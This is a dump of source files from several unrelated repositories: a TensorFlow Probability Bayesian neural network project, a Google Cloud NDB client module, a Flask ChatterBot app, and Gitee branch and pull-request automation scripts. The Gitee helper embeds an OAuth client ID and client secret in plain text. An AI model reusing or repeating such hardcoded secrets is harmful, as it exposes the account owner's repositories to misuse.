"vie2bgd/bayesianNN", "src_encoding": "UTF-8", "text": "from absl import flags\nimport os\n\nflags.DEFINE_string(\"data_dir\",\n default=os.path.join(os.getenv(\"TEST_TMPDIR\", \"/tmp\"),\n \"bayesian_neural_network/data\"),\n help=\"Directory where data is stored (if using real data).\")\n\nflags.DEFINE_string(\"model_dir\",\n default=os.path.join(os.getenv(\"TEST_TMPDIR\", \"/tmp\"),\n \"bayesian_neural_network/\"),\n help=\"Directory to put the model's fit.\")\n\nflags.DEFINE_float(\"learning_rate\",\n default=0.01,\n help=\"Initial learning rate.\")\n\nflags.DEFINE_integer(\"max_epochs\",\n default=6000,\n help=\"Number of training epochs to run.\")\n\nflags.DEFINE_integer(\"num_hidden_layers\",\n default=2,\n help=\"Number of hidden layers\")\n\nflags.DEFINE_integer(\"num_neurons_per_layer\",\n default=50,\n help=\"Number of neurons per hidden layer\")\n\nflags.DEFINE_list(\"layer_sizes\",\n default=[\"128\", \"128\", \"128\"],\n help=\"Comma-separated list denoting hidden units per layer.\")\n\nflags.DEFINE_string(\"activation_function\",\n default=\"relu\",\n help=\"Activation function for all hidden layers.\")\n\nflags.DEFINE_integer(\"batch_size\",\n default=44,\n help=\"Batch size. Must divide evenly into dataset sizes.\")\n\nflags.DEFINE_integer(\"num_monte_carlo\",\n default=10000,\n help=\"Network draws to compute predictive probabilities.\")\n\n\nflags.DEFINE_integer(\"num_epochs\",\n default=10000,\n help=\"Number of epochs to run the training for.\")\n\nflags.DEFINE_string(\"hyperparams_dir\",\n default=\"hyperparams.json\",\n help=\"Directory to the json for the hyperparameters\")\n\nflags.DEFINE_integer(\"num_principal_components\",\n default=200,\n help=\"Number of principal components to reduce the dataset into.\")" }, { "alpha_fraction": 0.7119265794754028, "alphanum_fraction": 0.7137614488601685, "avg_line_length": 37.96428680419922, "blob_id": "24528561ab0d1535e84e18981ec373024ee01c18", "content_id": "a368a88a90b2da5577832d1d59ad4f3cdc795cac", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1090, "license_type": "no_license", "max_line_length": 76, "num_lines": 28, "path": "/utils.py", "repo_name": "vie2bgd/bayesianNN", "src_encoding": "UTF-8", "text": "# Dependencies\nimport tensorflow as tf\nimport tensorflow_probability as tfp\nimport numpy as np\nimport math\nimport json\n\ntfd = tf.contrib.distributions\n\ndef default_multivariate_normal_fn(dtype, shape, name, trainable,\n add_variable_fn):\n \"\"\"Creates multivariate standard `Normal` distribution.\n Args:\n dtype: Type of parameter's event.\n shape: Python `list`-like representing the parameter's event shape.\n name: Python `str` name prepended to any created (or existing)\n `tf.Variable`s.\n trainable: Python `bool` indicating all created `tf.Variable`s should be\n added to the graph collection `GraphKeys.TRAINABLE_VARIABLES`.\n add_variable_fn: `tf.get_variable`-like `callable` used to create (or\n access existing) `tf.Variable`s.\n Returns:\n Multivariate standard `Normal` distribution.\n \"\"\"\n del name, trainable, add_variable_fn # unused\n dist = tfd.Normal(loc=tf.zeros(shape, dtype), scale=1.0)\n batch_ndims = tf.size(dist.batch_shape_tensor())\n return tfd.Independent(dist, reinterpreted_batch_ndims=batch_ndims)" }, { "alpha_fraction": 0.4333333373069763, "alphanum_fraction": 0.7066666483879089, "avg_line_length": 17.75, "blob_id": "6963663aa415f40cc081384b78caad8cd02287f1", "content_id": "b78ff662d76f131ae10d7d8bda7a2379e842ded7", 
"detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 150, "license_type": "no_license", "max_line_length": 30, "num_lines": 8, "path": "/requirements.txt", "repo_name": "vie2bgd/bayesianNN", "src_encoding": "UTF-8", "text": "absl_py==0.2.0\nhyperopt==0.1\ntfp_nightly==0.0.1.dev20180426\nnumpy==1.14.2\ntf_nightly==1.9.0.dev20180425\npandas==0.22.0\nabsl==0.0\nscikit_learn==0.19.1\n" }, { "alpha_fraction": 0.821689248085022, "alphanum_fraction": 0.821689248085022, "avg_line_length": 105.55555725097656, "blob_id": "b1cea75424fac7fc9924d3bba4078a97ef2d3709", "content_id": "735d41804a110608fc393d120730704de4298dc9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 959, "license_type": "no_license", "max_line_length": 476, "num_lines": 9, "path": "/README.md", "repo_name": "vie2bgd/bayesianNN", "src_encoding": "UTF-8", "text": "# Bayesian Neural Network with TensorFlow\n\nThis repository regards the implementation of Bayesian Artificial Neural Networks as described in my thesis. Central for the implementation was the module [TensorFlow Probability](https://github.com/tensorflow/probability \"TensorFlow Probability Repository\"), where much of our technical work was inspired by [Dustin Tran's demo example](https://github.com/tensorflow/probability/blob/master/tensorflow_probability/examples/bayesian_neural_network.py \"bayesian_neural_network.py\").\n\nThe repository is mainly structured as follows:\\\n[Requirements](https://github.com/csamuelsson/bayesianNN/blob/master/requirements.txt)\\\n[Data pre-processing](https://github.com/csamuelsson/bayesianNN/blob/master/datamanipulation.py)\\\n[Hyperparameter optimisation](https://github.com/csamuelsson/bayesianNN/blob/master/bayesianNN.py)\\\n[Get metrics for the final model](https://github.com/csamuelsson/bayesianNN/blob/master/finalmodel.py)\n" } ]
6
MonicaRizzolli/waveCollapseFunction
https://github.com/MonicaRizzolli/waveCollapseFunction
e49c39d715db60b97d34e8a4132242f8ba24f71b
c38522ecc75a208fa829ca3e1f7195ea32af4488
8e79a226001863be24634484e138cfe3527c464c
refs/heads/master
2023-07-01T18:40:46.900202
2021-08-03T12:26:36
2021-08-03T12:26:36
246,406,294
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5472736358642578, "alphanum_fraction": 0.5670335292816162, "avg_line_length": 30.690475463867188, "blob_id": "c8f9d5eeb729de1975b599e9a886c82c8747f2ab", "content_id": "434d4817c34fc54d469aaeca372f7668d644e270", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4008, "license_type": "no_license", "max_line_length": 125, "num_lines": 126, "path": "/waveCollapseOverlaping.pyde", "repo_name": "MonicaRizzolli/waveCollapseFunction", "src_encoding": "UTF-8", "text": "# Este sketch é baseado no post: Wave Collapse Function algorithm in Processing\n# Publicado no dia 5 de julho de 2019 no Discourse - Processing Foundation\n# https://discourse.processing.org/t/wave-collapse-function-algorithm-in-processing/12983\n# Customizado por Monica Rizzolli para gerar output em PDF, salvar png e rodar suave no processing modo Phyton\n# Versão: Overlapping model\n\nadd_library('pdf')\nfrom collections import Counter\nfrom itertools import chain\nfrom random import choice, sample\n\nout_w, out_h = 60, 60 \nf = 12\nN = 3\n\ndef setup():\n beginRecord(PDF, \"nome.pdf\")\n size(out_w*f, out_h*f, P2D)\n background(255)\n noStroke()\n\n global wave, adjacencies, entropy, directions, patterns, freqs, cell_w, cell_h\n\n img = loadImage('wave10A.png') \n img_w, img_h = img.width, img.height \n cell_w, cell_h = width//out_w, height//out_h \n kernel = tuple(tuple(i + n*img_w for i in xrange(N)) for n in xrange(N)) \n directions = ((-1, 0), (1, 0), (0, -1), (0, 1)) \n all = [] \n\n for y in xrange(img_h):\n for x in xrange(img_w):\n \n cmat = tuple(tuple(img.pixels[((x+n)%img_w)+(((a[0]+img_w*y)/img_w)%img_h)*img_w] for n in a) for a in kernel)\n \n # Padrões rotacionados (90°, 180°, 270°, 360°)\n for r in xrange(4):\n cmat = zip(*cmat[::-1]) # +90°\n all.append(cmat)\n all.append(cmat[::-1]) # reflexão vertical \n all.append([a[::-1] for a in cmat]) # reflexão horizontal \n\n\n all = [tuple(chain.from_iterable(p)) for p in all]\n c = Counter(all) \n freqs = c.values() \n patterns = c.keys() \n npat = len(freqs) \n\n wave = dict(enumerate(tuple(set(range(npat)) for i in xrange(out_w*out_h))))\n\n entropy = dict(enumerate(sample(tuple(npat if i > 0 else npat-1 for i in xrange(out_w*out_h)), out_w*out_h)))\n\n adjacencies = dict(enumerate(tuple(set() for dir in xrange(len(directions))) for i in xrange(npat))) # explanations below\n\n '''\n 0 = esquerda\n 1 = direita\n 2 = em cima\n 3 = em baixo\n '''\n \n for i1 in xrange(npat):\n for i2 in xrange(npat):\n\n if [n for i, n in enumerate(patterns[i1]) if i%N!=(N-1)] == [n for i, n in enumerate(patterns[i2]) if i%N!=0]:\n adjacencies[i1][0].add(i2)\n adjacencies[i2][1].add(i1)\n\n if patterns[i1][:(N*N)-N] == patterns[i2][N:]:\n adjacencies[i1][2].add(i2)\n adjacencies[i2][3].add(i1)\n\ndef draw():\n global entropy, wave, tecla\n print(frameCount)\n\n if not entropy:\n endRecord()\n print 'finished'\n noLoop()\n return\n\n entropy_min = min(entropy, key = entropy.get)\n\n pattern_id = choice([pattern_idx for pattern_idx in wave[entropy_min] for i in xrange(freqs[pattern_idx])]) \n\n wave[entropy_min] = {pattern_id}\n\n del entropy[entropy_min]\n\n stack = {entropy_min}\n\n while stack:\n\n cell_idx = stack.pop() # index of current cell\n for dir, t in enumerate(directions):\n x = (cell_idx%out_w + t[0])%out_w\n y = (cell_idx/out_w + t[1])%out_h\n neighbor_idx = x + y * out_w # index of negihboring cell\n\n if neighbor_idx in entropy:\n\n possible = {n for pattern_idx in wave[cell_idx] for n in 
adjacencies[pattern_idx][dir]}\n\n available = wave[neighbor_idx]\n\n if not available.issubset(possible):\n\n intersection = possible & available\n\n if not intersection:\n print 'contradiction'\n noLoop()\n return\n\n wave[neighbor_idx] = intersection\n\n entropy[neighbor_idx] = len(wave[neighbor_idx]) - random(.1)\n\n stack.add(neighbor_idx)\n\n fill(patterns[pattern_id][0])\n rect((entropy_min%out_w) * cell_w, (entropy_min/out_w) * cell_h, cell_w, cell_h)\n\n saveFrame(\"#######waveCF.png\")\n \n" }, { "alpha_fraction": 0.7731629610061646, "alphanum_fraction": 0.7891373634338379, "avg_line_length": 38.125, "blob_id": "c8bc8440ac6629dfca91e5b37a293d0fbed1879b", "content_id": "ae6974aac3e4aec7de20441fda94ca612e474e3b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 317, "license_type": "no_license", "max_line_length": 173, "num_lines": 8, "path": "/README.md", "repo_name": "MonicaRizzolli/waveCollapseFunction", "src_encoding": "UTF-8", "text": "# *Wave Function Collapse*\n## Overlapping model ##\n\nI forked this code from the post “Wave Collapse Function algorithm in Processing”: https://discourse.processing.org/t/wave-collapse-function-algorithm-in-processing/12983\n\nGenerate procedural patterns from a sample image. \n\nPorted to Processing Python mode.\n" } ]
2
yeaat/google-cloud-python
https://github.com/yeaat/google-cloud-python
9f9b1049cc3ff3ec0290a22e0cbfa034f08d3cc8
29fba13510e6d41df67dbc44807573f3bdebe379
1fb485f3b99c4312df7a20135a8516bf5887087a
refs/heads/master
2020-04-12T18:11:42.047931
2018-12-20T18:36:32
2018-12-20T18:36:32
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.693829357624054, "alphanum_fraction": 0.6976675391197205, "avg_line_length": 33.56122589111328, "blob_id": "702c421e52ee3aa6fa0a7c475e689818759d8006", "content_id": "a8c455b81ba6764c18774c1a392c02a55dee4dea", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3387, "license_type": "permissive", "max_line_length": 79, "num_lines": 98, "path": "/ndb/src/google/cloud/ndb/client.py", "repo_name": "yeaat/google-cloud-python", "src_encoding": "UTF-8", "text": "# Copyright 2018 Google LLC\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# https://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"A client for NDB which manages credentials, project, namespace.\"\"\"\n\nimport os\n\nfrom google.cloud import environment_vars\nfrom google.cloud import _helpers\nfrom google.cloud import client as google_client\nfrom google.cloud.datastore_v1.gapic import datastore_client\n\nDATASTORE_API_HOST = datastore_client.DatastoreClient.SERVICE_ADDRESS.rstrip(\n \":443\"\n)\n\n\ndef _get_gcd_project():\n \"\"\"Gets the GCD application ID if it can be inferred.\"\"\"\n return os.getenv(environment_vars.GCD_DATASET)\n\n\ndef _determine_default_project(project=None):\n \"\"\"Determine default project explicitly or implicitly as fall-back.\n\n In implicit case, supports four environments. In order of precedence, the\n implicit environments are:\n\n * DATASTORE_DATASET environment variable (for ``gcd`` / emulator testing)\n * GOOGLE_CLOUD_PROJECT environment variable\n * Google App Engine application ID\n * Google Compute Engine project ID (from metadata server)\n_\n Arguments:\n project (Optional[str]): The project to use as default.\n\n Returns:\n Union([str, None]): Default project if it can be determined.\n \"\"\"\n if project is None:\n project = _get_gcd_project()\n\n if project is None:\n project = _helpers._determine_default_project(project=project)\n\n return project\n\n\nclass Client(google_client.ClientWithProject):\n \"\"\"An NDB client.\n\n Arguments:\n project (Optional[str]): The project to pass to proxied API methods. If\n not passed, falls back to the default inferred from the\n environment.\n namespace (Optional[str]): Namespace to pass to proxied API methods.\n credentials (Optional[:class:`~google.auth.credentials.Credentials`]):\n The OAuth2 Credentials to use for this client. 
If not passed, falls\n back to the default inferred from the environment.\n \"\"\"\n\n SCOPE = (\"https://www.googleapis.com/auth/datastore\",)\n \"\"\"The scopes required for authenticating as a Cloud Datastore consumer.\"\"\"\n\n secure = True\n \"\"\"Whether to use a secure connection for API calls.\"\"\"\n\n def __init__(self, project=None, namespace=None, credentials=None):\n super(Client, self).__init__(project=project, credentials=credentials)\n self.namespace = namespace\n self.host = os.environ.get(\n environment_vars.GCD_HOST, DATASTORE_API_HOST\n )\n\n @property\n def _http(self):\n \"\"\"Getter for object used for HTTP transport.\n\n Raises:\n NotImplementedError: Always, HTTP transport is not supported.\n \"\"\"\n raise NotImplementedError(\"HTTP transport is not supported.\")\n\n @staticmethod\n def _determine_default(project):\n \"\"\"Helper: override default project detection.\"\"\"\n return _determine_default_project(project)\n" }, { "alpha_fraction": 0.7023809552192688, "alphanum_fraction": 0.7120535969734192, "avg_line_length": 31.780487060546875, "blob_id": "d4e3eabc4ad720431bdc999c806d26317f652c58", "content_id": "89f4b4be90e362f74e18b137d11d3490a84eb128", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1344, "license_type": "permissive", "max_line_length": 83, "num_lines": 41, "path": "/ndb/src/google/cloud/ndb/_api.py", "repo_name": "yeaat/google-cloud-python", "src_encoding": "UTF-8", "text": "# Copyright 2018 Google LLC\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# https://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"Functions that interact with Datastore backend.\"\"\"\n\nimport grpc\n\nfrom google.cloud import _helpers\nfrom google.cloud import _http\nfrom google.cloud.datastore_v1.proto import datastore_pb2_grpc\n\n\ndef stub(client):\n \"\"\"Get a stub for the `Google Datastore` API.\n\n Arguments:\n client (:class:`~client.Client`): An NDB client instance.\n\n Returns:\n :class:`~google.cloud.datastore_v1.proto.datastore_pb2_grpc.DatastoreStub`:\n The stub instance.\n \"\"\"\n if client.secure:\n channel = _helpers.make_secure_channel(\n client._credentials, _http.DEFAULT_USER_AGENT, client.host\n )\n else:\n channel = grpc.insecure_channel(client.host)\n stub = datastore_pb2_grpc.DatastoreStub(channel)\n return stub\n" } ]
2
karisurya77/Chatbot
https://github.com/karisurya77/Chatbot
cd7c13ad6080b4e6817508bca95b8ef439bfc257
8871da2ab7d14475706a515186ae5ba228017a91
f460ceb5f5950aecb66124336f49203957d14b1b
refs/heads/master
2020-04-07T20:09:52.064376
2018-11-22T10:03:08
2018-11-22T10:03:08
158,677,754
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5505107641220093, "alphanum_fraction": 0.5675368905067444, "avg_line_length": 21.236841201782227, "blob_id": "61c221466f0359de61fa5945610004d9d7f3f91a", "content_id": "c1a334df06b4753375fbc5312bc0cd5f26251cf4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 881, "license_type": "no_license", "max_line_length": 49, "num_lines": 38, "path": "/app.py", "repo_name": "karisurya77/Chatbot", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sun Nov 18 11:04:09 2018\r\n\r\n@author: suryaprakash.rao\r\n\"\"\"\r\n\r\nfrom flask import Flask,request\r\n#from flask import make_response\r\n#from flask import jsonify\r\nfrom flask_json import FlaskJSON, as_json_p\r\nfrom Chattertest import bot1\r\n\r\napp = Flask(__name__)\r\njson = FlaskJSON(app)\r\napp.config['JSON_ADD_STATUS'] = False\r\napp.config['JSON_JSONP_OPTIONAL'] = False\r\n\r\nprint (app.app_context())\r\nwith app.app_context():\r\n ctx=app.app_context()\r\n ctx.push()\r\n \r\n @app.route(\"/\")\r\n def home():\r\n return (\"hi\")\r\n @app.route(\"/index\")\r\n \r\n @app.route('/login', methods=['GET', 'POST'])\r\n @as_json_p\r\n def login():\r\n qus=request.args.get('mydata') \r\n ans=bot1(str(qus))\r\n test=\"Bot :\" + \"=\"+ str(ans)\r\n return (test) \r\n\r\n if __name__ == \"__main__\":\r\n app.run(debug = True)" }, { "alpha_fraction": 0.7599999904632568, "alphanum_fraction": 0.7599999904632568, "avg_line_length": 11.5, "blob_id": "904b55fdb8202f87c7cd3f2b0947c695a0b44769", "content_id": "0ee0f3940b4a0fcb4b5930da0a81be392a01839a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 25, "license_type": "no_license", "max_line_length": 14, "num_lines": 2, "path": "/README.md", "repo_name": "karisurya77/Chatbot", "src_encoding": "UTF-8", "text": "# Chatbot\nML for ChatBot\n" }, { "alpha_fraction": 0.5864661931991577, "alphanum_fraction": 0.621553897857666, "avg_line_length": 17.549999237060547, "blob_id": "26c9523ef75f3b26480bcded43686a12bd08333c", "content_id": "61ae8160eed47002a68473af766e8857ae850240", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 399, "license_type": "no_license", "max_line_length": 84, "num_lines": 20, "path": "/Chattertest.py", "repo_name": "karisurya77/Chatbot", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Nov 14 17:12:27 2018\r\n\r\n@author: suryaprakash.rao\r\n\"\"\"\r\n\r\nimport chatterbot\r\n#import string\r\n\r\n\r\nbot=chatterbot.ChatBot('ibot',trainer='chatterbot.trainers.ChatterBotCorpusTrainer')\r\nbot.train('chatterbot.corpus.english')\r\n\r\ndef bot1(qus):\r\n if qus=='N':\r\n ans=\"good Bye\"\r\n else:\r\n ans=bot.get_response(qus)\r\n return(ans)\r\n " } ]
3
Crazysiri/checkinTestManage
https://github.com/Crazysiri/checkinTestManage
98daa94a09ece575720a0cb3bf7746c028ec840c
69e77cf73055983a916e3de0d64dd61abcca26c7
4840357f6948d538c70b65fe9a34d602d30538c7
refs/heads/master
2020-05-30T19:36:28.620648
2019-06-06T06:31:35
2019-06-06T06:31:35
189,927,789
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5029252171516418, "alphanum_fraction": 0.5187432169914246, "avg_line_length": 25.517240524291992, "blob_id": "e49da4c1c925b6d8bc1110d6ebee70084dd8287b", "content_id": "913a5e33221a7265cef0a0dfeafe177461c0212c", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 9454, "license_type": "permissive", "max_line_length": 135, "num_lines": 348, "path": "/framework/requestLenz.py", "repo_name": "Crazysiri/checkinTestManage", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n# -*- coding: UTF-8 -*-\n\n#sudo pip install pyyaml\n#sudo pip install requests\n#pip install ruamel.yaml\n\nimport requests\n\nimport sys\nimport os\nimport getopt\nimport yaml\nimport time\n\n#此参数需要外部配置,授权获取token的,其中username password为 gitee账户密码\nrequest_config_username = ''\nrequest_config_password = ''\nrequest_config_clientid = '4af0cd03a89df6c632efe70fe90623d94b4ee1a385ec147e0ff6c2d16ff42ff4'\nrequest_config_clientsecret = 'f5211dc8261cf0c0d997eef6c8c3bce6adf65cab69a3d65d30cf32993c89161e'\n\nclass LenzRequest:\n \n token = ''\n owner = ''\n repo = ''\n \n def __init__(self,owner,repo):\n self.owner = owner\n self.repo = repo\n \n self.getToken()\n \n def getTokenInDisk(self):\n path = os.path.dirname(os.path.realpath(__file__))\n path = os.path.join(path,\"configs/token.yaml\")\n \n if not os.path.isfile(path):\n os.system(\"touch \" + path)\n f = open(path,'r')\n \n content = f.read()\n \n content_yaml = yaml.load(content)\n \n try:\n token = content_yaml['token']\n date = int(content_yaml['date'])\n except TypeError:\n token = ''\n date = 0\n \n current_date = int(time.time())\n \n #12小时\n if current_date - date > 60 * 60 *12:\n self.token = None\n else:\n self.token = token\n f.close()\n\n def saveTokenToDisk(self):\n\n path = os.path.dirname(os.path.realpath(__file__))\n path = os.path.join(path,\"configs/token.yaml\")\n \n f = open(path,'r')\n content = f.read()\n\n content_yaml = {}\n \n f = open(path,'w')\n current_date = int(time.time())\n content_yaml['token'] = self.token\n content_yaml['date'] = current_date\n\n yaml.dump(content_yaml, f)\n\n \n #获取 授权token\n def getToken(self):\n \n self.getTokenInDisk()\n \n if not self.token:\n \n post_headers = {\n \"Content-Type\":'application/x-www-form-urlencoded'\n }\n\n params = {\n \"grant_type\":\"password\",\n \"username\":request_config_username,\n \"password\":request_config_password,\n \"client_id\":request_config_clientid,\n \"client_secret\":request_config_clientsecret,\n# \"scope\":\"user_info projects pull_requests issues notes keys hook groups gists enterprises\"\n \"scope\":\"user_info projects pull_requests issues notes keys hook groups gists\"\n\n }\n\n url = \"https://gitee.com/oauth/token\"\n req = requests.post(url,params=params,headers=post_headers)\n result = req.json()\n print(str(result))\n self.token = result[\"access_token\"]\n self.saveTokenToDisk()\n\n#获取所有分支\n def getAllBranches(self):\n url = 'https://gitee.com/api/v5/repos/'+self.owner+'/'+self.repo+'/branches'\n \n post_headers = {\n \"Content-Type\":'application/x-www-form-urlencoded'\n }\n \n params = {\n \"access_token\":self.token,\n \"owner\":self.owner,\n \"repo\":self.repo,\n }\n \n req = requests.get(url,params=params,headers=post_headers)\n result = req.json()\n return result\n \n \n \n#创建新分支\n def createNewBranch(self,branch,branch_from):\n url = 'https://gitee.com/api/v5/repos/'+self.owner+'/'+self.repo+'/branches'\n\n post_headers = {\n \"Content-Type\":'application/x-www-form-urlencoded'\n 
}\n \n params = {\n \"access_token\":self.token,\n \"owner\":self.owner,\n \"repo\":self.repo,\n \"refs\":branch_from,\n \"branch_name\":branch\n }\n \n req = requests.post(url,params=params,headers=post_headers)\n result = req.json()\n return result\n\n \n \n \n \n#邀请 加入 某个库\n def inviteRepoMember(self,member,repo):\n url = 'https://gitee.com/api/v5/repos/'+self.owner+'/'+repo+'/collaborators/'+member\n \n post_headers = {\n \"Content-Type\":'application/json'\n }\n \n params = {\n \"access_token\":self.token,\n \"owner\":self.owner,\n \"repo\":repo,\n \"username\":member,\n \"permission\":\"push\"\n }\n \n \n result = requests.put(url,params=params,headers=post_headers)\n return result.json()\n\n\n def getAllPRS(self):\n url = 'https://gitee.com/api/v5/repos/'+self.owner+'/'+self.repo+'/pulls'\n\n post_headers = {\n \"Content-Type\":'application/json'\n }\n\n params = {\n \"access_token\":self.token,\n \"owner\":self.owner,\n \"repo\":self.repo,\n \"state\":\"open\",\n \"sort\":\"created\",\n \"direction\":\"desc\",\n \"page\":1,\n \"per_page\":20\n }\n\n req = requests.get(url,params=params,headers=post_headers)\n\n result = req.json()\n return result\n \n \n \n #获取pr提交记录\n def getPRCommits(self,number):\n url = 'https://gitee.com/api/v5/repos/%s/%s/pulls/%s/commits' % (self.owner,self.repo,number)\n\n post_headers = {\n \"Content-Type\":'application/json'\n }\n\n params = {\n \"access_token\":self.token,\n \"owner\":self.owner,\n \"repo\":self.repo,\n \"number\":number\n }\n\n req = requests.get(url,params=params,headers=post_headers)\n\n return req.json()\n \"\"\"\n {\n \"sha\": \"2a94be825ce1ea2cd8d22f2aa10fac23ba19167d\",\n \"filename\": \"LenzBusiness/App部分逻辑说明文档\",\n \"status\": null,\n \"additions\": \"82\",\n \"deletions\": \"25\",\n \"blob_url\": \"https://gitee.com/ppz_bj/LenzBusiness/blob/2a94be825ce1ea2cd8d22f2aa10fac23ba19167d/LenzBusiness/App部分逻辑说明文档\",\n \"raw_url\": \"https://gitee.com/ppz_bj/LenzBusiness/raw/2a94be825ce1ea2cd8d22f2aa10fac23ba19167d/LenzBusiness/App部分逻辑说明文档\",\n \"patch\": {\n \"diff\": \"\",\n \"new_path\": \"LenzBusiness/App部分逻辑说明文档\",\n \"old_path\": \"LenzBusiness/App部分逻辑说明文档\",\n \"a_mode\": \"100644\",\n \"b_mode\": \"100644\",\n \"new_file\": false,\n \"renamed_file\": false,\n \"deleted_file\": false,\n \"too_large\": false\n }\n }\n \"\"\"\n #获取pr diff\n def getPRDiffs(self,number):\n \n url = 'https://gitee.com/api/v5/repos/%s/%s/pulls/%s/files' % (self.owner,self.repo,number)\n\n post_headers = {\n \"Content-Type\":'application/json'\n }\n \n params = {\n \"access_token\":self.token,\n \"owner\":self.owner,\n \"repo\":self.repo,\n \"number\":number\n }\n\n req = requests.get(url,params=params,headers=post_headers)\n return req.json()\n\n\n #创建pr\n def createPR(self,branch,title):\n \n url = 'https://gitee.com/api/v5/repos/'+self.owner+'/'+self.repo+'/pulls'\n\n post_headers = {\n \"Content-Type\":'application/json'\n }\n\n params = {\n \"access_token\":self.token,\n \"title\":title,\n \"head\":branch,\n \"base\":\"master\"\n }\n\n\n req = requests.post(url,params=params,headers=post_headers)\n result = req.json()\n success = False\n number = 0\n try:\n id = result['id']\n number = result['number']\n success = True\n except KeyError:\n success = False\n print('createPR'+str(result))\n return success,number\n\n\n \n #返回所有的评论 和 pr url\n def getPRByAllProcesses(self,branch,title):\n \n #first creat pr\n success,number = self.createPR(branch,title)\n if not success:\n #second if created get pr number in listlist\n result = self.getAllPRS()\n\n for 
pr in result:\n number = pr[\"number\"]\n b = pr[\"head\"][\"ref\"]\n if branch == b:\n success = True\n break\n\n result = self.getPRCommits(number)\n \n list = []\n \n for commit in result:\n list.append(commit['commit']['message'])\n# print('message:'+commit['commit']['message'])\n pr_url = 'https://gitee.com/%s/%s/pulls/%s' %(self.owner,self.repo,number)\n return list,pr_url\n\n\n\nimport ruamel.yaml\nfrom ruamel.yaml.util import load_yaml_guess_indent\n\n\n\n\ndef main(argv):\n if sys.getdefaultencoding() != 'utf-8':\n reload(sys)\n sys.setdefaultencoding('utf-8')\n \n print ('\\n')\n\n branch_for_pr = \"feature/2019_05_14_吕博涧_时间打点\"\n\n title = \"pr:\" + branch_for_pr\n\n request = LenzRequest('ppz_bj','LenzBusiness')\n request.getPRByAllProcesses(branch_for_pr,title)\n\n #btcxiaowu,zhang_jack,Lenz_ydd\n# result = request.inviteRepoMember('zhang_jack','LenzPictureQuestionModule')\n\n# result = getAllPRS(token,\"LenzBusiness\")\n\n\n\n\nif __name__ == \"__main__\":\n main(sys.argv[1:])\n\n\n" }, { "alpha_fraction": 0.5481637120246887, "alphanum_fraction": 0.5534102916717529, "avg_line_length": 23.689119338989258, "blob_id": "74dbe9e3aaf9d698016ae884165fadde4271b4a1", "content_id": "eb08b001da70599bd6450bb8908cd11f3895a2c9", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5085, "license_type": "permissive", "max_line_length": 75, "num_lines": 193, "path": "/createProject.py", "repo_name": "Crazysiri/checkinTestManage", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n# -*- coding: UTF-8 -*-\n\n#import urllib.request\n#from urllib import request,parse\n# pip install ruamel.yaml\n\nimport sys\nimport os\nimport getopt\nimport time\nimport io\n\nimport git\nfrom git import Repo\n\nimport ruamel.yaml\nfrom ruamel.yaml.util import load_yaml_guess_indent\n\n\npath = os.path.dirname(os.path.realpath(__file__))\n\nsys.path.append(path+'/framework')\nfrom translate import translate_baidu\nsys.path.append(path+'/template')\nfrom templateManager import TemplateConfig\n\n#log = master.log()\n\n#currentCommit = repo.commit(currentBranch)\n#compareCommit = repo.commit(compareBranch)\n\n#diffed = repo.log(currentBranch,compareBranch)\n#print(currentCommit+currentCommit)\n\n\n#commits = list(repo.iter_commits(currentBranch))[:5]\n#for commit in commits:\n# print('author:%s email:%s' % (commit.author.name,commit.author.email))\n\ndef getGitBranchNameFromTaskName(taskName):\n\n content = translate_baidu(taskName)\n\n return handleTranslateStr(content)\n\n#首字母大写然后拼接\ndef handleTranslateStr(content):\n\n comps = content.split(' ')\n comps_new = []\n for com in comps:\n com = com.capitalize()\n comps_new.append(com)\n return ''.join(comps_new)\n\n\ndef create():\n if sys.getdefaultencoding() != 'utf-8':\n reload(sys)\n sys.setdefaultencoding('utf-8')\n \n path = os.path.dirname(os.path.realpath(__file__))\n path = os.path.join(path,'config.yaml')\n yamlContent,ind,bsi = load_yaml_guess_indent(open(path))\n \n \n print ('\\n')\n print ('\\n')\n # 'LenzBusiness' 'LenzMember'\n print('-----------------------------------')\n print('工程列表:')\n count = 0\n for p in yamlContent['project_list']:\n count += 1\n print(str(count)+'.'+p['prefix'])\n print('-----------------------------------')\n repo_index = int(raw_input('请输入工程名称索引:'))\n print('-----------------------------------')\n repo_name = yamlContent['project_list'][repo_index - 